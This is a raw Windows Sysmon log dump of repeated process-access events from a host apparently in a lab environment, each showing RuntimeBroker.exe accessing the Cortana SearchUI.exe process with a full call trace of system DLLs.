13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406156C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406156C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405424C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405424C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406140C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45406140C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405660C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.211{59A5CD1D-93F9-6005-F104-00000000A301}45405544C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 